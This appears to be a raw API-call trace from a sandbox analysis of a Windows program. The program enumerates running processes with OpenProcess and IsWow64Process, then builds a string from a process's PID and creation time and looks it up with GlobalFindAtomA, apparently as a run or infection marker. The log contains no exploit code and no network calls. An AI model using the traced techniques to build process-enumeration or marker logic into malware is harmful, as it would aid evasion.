	[0090.870] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.870] CloseHandle (hObject=0x20c) returned 1
	[0090.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.871] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.871] CloseHandle (hObject=0x20c) returned 1
	[0090.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.871] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.871] CloseHandle (hObject=0x20c) returned 1
	[0090.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.871] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.871] CloseHandle (hObject=0x20c) returned 1
	[0090.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.871] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.871] CloseHandle (hObject=0x20c) returned 1
	[0090.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.871] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.871] CloseHandle (hObject=0x20c) returned 1
	[0090.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.872] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.872] CloseHandle (hObject=0x20c) returned 1
	[0090.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.872] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.872] CloseHandle (hObject=0x20c) returned 1
	[0090.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.872] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.872] CloseHandle (hObject=0x20c) returned 1
	[0090.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.872] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.872] CloseHandle (hObject=0x20c) returned 1
	[0090.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.872] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.872] CloseHandle (hObject=0x20c) returned 1
	[0090.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.872] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.872] CloseHandle (hObject=0x20c) returned 1
	[0090.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.873] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.873] CloseHandle (hObject=0x20c) returned 1
	[0090.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.873] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.873] CloseHandle (hObject=0x20c) returned 1
	[0090.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.873] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.873] CloseHandle (hObject=0x20c) returned 1
	[0090.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.873] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.873] CloseHandle (hObject=0x20c) returned 1
	[0090.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.873] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.873] CloseHandle (hObject=0x20c) returned 1
	[0090.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.873] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.874] CloseHandle (hObject=0x20c) returned 1
	[0090.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.874] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.874] CloseHandle (hObject=0x20c) returned 1
	[0090.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.874] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.874] CloseHandle (hObject=0x20c) returned 1
	[0090.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.874] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.874] CloseHandle (hObject=0x20c) returned 1
	[0090.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.874] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.874] CloseHandle (hObject=0x20c) returned 1
	[0090.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.875] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.875] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.875] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.875] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.875] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.875] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.875] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.876] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.876] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.876] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.876] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.876] CloseHandle (hObject=0x20c) returned 1
	[0090.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.876] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.877] CloseHandle (hObject=0x20c) returned 1
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.951] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.951] CloseHandle (hObject=0x20c) returned 1
	[0090.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.951] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.951] CloseHandle (hObject=0x20c) returned 1
	[0090.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.952] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.952] CloseHandle (hObject=0x20c) returned 1
	[0090.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.952] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.952] CloseHandle (hObject=0x20c) returned 1
	[0090.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.952] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.952] CloseHandle (hObject=0x20c) returned 1
	[0090.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.952] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.952] CloseHandle (hObject=0x20c) returned 1
	[0090.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.952] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.952] CloseHandle (hObject=0x20c) returned 1
	[0090.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.952] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.952] CloseHandle (hObject=0x20c) returned 1
	[0090.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.953] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.953] CloseHandle (hObject=0x20c) returned 1
	[0090.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.953] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.953] CloseHandle (hObject=0x20c) returned 1
	[0090.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.953] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.953] CloseHandle (hObject=0x20c) returned 1
	[0090.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.953] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.953] CloseHandle (hObject=0x20c) returned 1
	[0090.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.953] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.953] CloseHandle (hObject=0x20c) returned 1
	[0090.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.954] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.954] CloseHandle (hObject=0x20c) returned 1
	[0090.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.954] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.954] CloseHandle (hObject=0x20c) returned 1
	[0090.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.954] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.954] CloseHandle (hObject=0x20c) returned 1
	[0090.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.954] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.954] CloseHandle (hObject=0x20c) returned 1
	[0090.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.954] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.954] CloseHandle (hObject=0x20c) returned 1
	[0090.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.955] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.955] CloseHandle (hObject=0x20c) returned 1
	[0090.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.955] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.955] CloseHandle (hObject=0x20c) returned 1
	[0090.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.955] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.955] CloseHandle (hObject=0x20c) returned 1
	[0090.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.955] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.955] CloseHandle (hObject=0x20c) returned 1
	[0090.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.955] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.955] CloseHandle (hObject=0x20c) returned 1
	[0090.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.955] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.955] CloseHandle (hObject=0x20c) returned 1
	[0090.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.956] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.956] CloseHandle (hObject=0x20c) returned 1
	[0090.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.956] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.956] CloseHandle (hObject=0x20c) returned 1
	[0090.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.956] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.956] CloseHandle (hObject=0x20c) returned 1
	[0090.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.956] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.956] CloseHandle (hObject=0x20c) returned 1
	[0090.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.956] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.956] CloseHandle (hObject=0x20c) returned 1
	[0090.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.957] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.957] CloseHandle (hObject=0x20c) returned 1
	[0090.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.957] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.957] CloseHandle (hObject=0x20c) returned 1
	[0090.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.957] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.957] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.957] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.957] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.958] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.958] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.958] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.958] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.958] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.958] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.959] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.959] CloseHandle (hObject=0x20c) returned 1
	[0090.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.959] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.959] CloseHandle (hObject=0x20c) returned 1
	[0091.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.063] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.063] CloseHandle (hObject=0x20c) returned 1
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.063] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.063] CloseHandle (hObject=0x20c) returned 1
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.064] CloseHandle (hObject=0x20c) returned 1
	[0091.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.064] CloseHandle (hObject=0x20c) returned 1
	[0091.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.064] CloseHandle (hObject=0x20c) returned 1
	[0091.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.064] CloseHandle (hObject=0x20c) returned 1
	[0091.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.064] CloseHandle (hObject=0x20c) returned 1
	[0091.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.064] CloseHandle (hObject=0x20c) returned 1
	[0091.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.065] CloseHandle (hObject=0x20c) returned 1
	[0091.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.065] CloseHandle (hObject=0x20c) returned 1
	[0091.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.065] CloseHandle (hObject=0x20c) returned 1
	[0091.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.065] CloseHandle (hObject=0x20c) returned 1
	[0091.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.065] CloseHandle (hObject=0x20c) returned 1
	[0091.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.066] CloseHandle (hObject=0x20c) returned 1
	[0091.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.066] CloseHandle (hObject=0x20c) returned 1
	[0091.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.066] CloseHandle (hObject=0x20c) returned 1
